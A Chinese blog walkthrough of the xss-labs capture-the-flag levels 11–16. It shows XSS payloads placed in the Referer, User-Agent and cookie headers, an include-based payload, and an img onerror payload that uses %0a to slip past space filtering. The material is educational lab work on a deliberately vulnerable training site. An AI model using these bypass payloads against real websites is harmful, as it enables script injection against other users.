XSS挑战赛(xsslabs)11~16关通关解析

本文介绍了XSS挑战赛中11至16关的通关过程,涉及通过修改referer、UA、cookie以及利用iframe和onerror事件触发XSS攻击的技巧。文章强调了理解防御机制和创新思维在发现及防范XSS漏洞中的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

简介

XSS挑战赛,里面包含了各种XSS的防御方式和绕过方式,好好掌握里面的绕过细节,有助于我们更好的去发现XSS漏洞以及XSS的防御。本文更多的是分享解析的细节,不是一个标准的答案,希望大家在渗透的时候有更多的思维。本文讲解11~16关卡。

开始挑战

Level11

通关过程

有Level10的经验了之后,这个地方习惯性看源码:
在这里插入图片描述
直接传递参数:
在这里插入图片描述
直接用第10关的payload: &t_sort=a" οnfοcus=“alert(1)” type=“text
在这里插入图片描述
经过思考这个地方存在一个t_ref, 灵机一动这个地方是不是referer?
随便传递一个referer过去试试?
在这里插入图片描述
在这里插入图片描述
将referer改为:a” οnfοcus=“alert(1)” type="text
在这里插入图片描述
在这里插入图片描述

payload

在referer中添加:

a" οnfοcus="alert(1)" type="text

Level12

通关过程

习惯性看源码:
在这里插入图片描述
直接改ua吧:
在这里插入图片描述
在这里插入图片描述

payload

在UA中填充:

a" οnfοcus="alert(1)" type="text

Level13

通关过程

习惯性看源码:
在这里插入图片描述
修改cookie:
在这里插入图片描述
在这里插入图片描述

payload

在cookie中添加:

user=a" οnfοcus="alert(1)" type="text

Level14

本关因iframe调用的文件地址失效,无法进行测试。
要考的应该是通过修改iframe调用的文件来实现xss注入

Level15

通关过程

习惯性看源码:
在这里插入图片描述
考虑将第一关卡包含进来:src=‘level1.php?name=’
这个地方可能是自己环境的原因,半天没有反应,但是原理应该是这样,大家可以自己试试。

payload

src='level1.php?name=<script>alert(1)</script>'

Level16

通关过程

在这里插入图片描述
直接使用payload:
在这里插入图片描述
换标签:<img src=1 οnerrοr=alert(1)>

在这里插入图片描述
想办法不让空格被替换,那么用%0a来表示空格试试:
<img%0asrc=1%0aοnerrοr=alert(1)>
在这里插入图片描述

payload

<img%0asrc=1%0aonerror=alert(1)>

其余关卡意义个人觉得不是很大了,就不做解析了。

总结

总的来说xsslabs还是很有代表意义的,里面提供了很多绕过和防御XSS的思路。
所谓知己知彼在这里面体现的淋漓尽致了。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Miracle_PHP|JAVA|安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值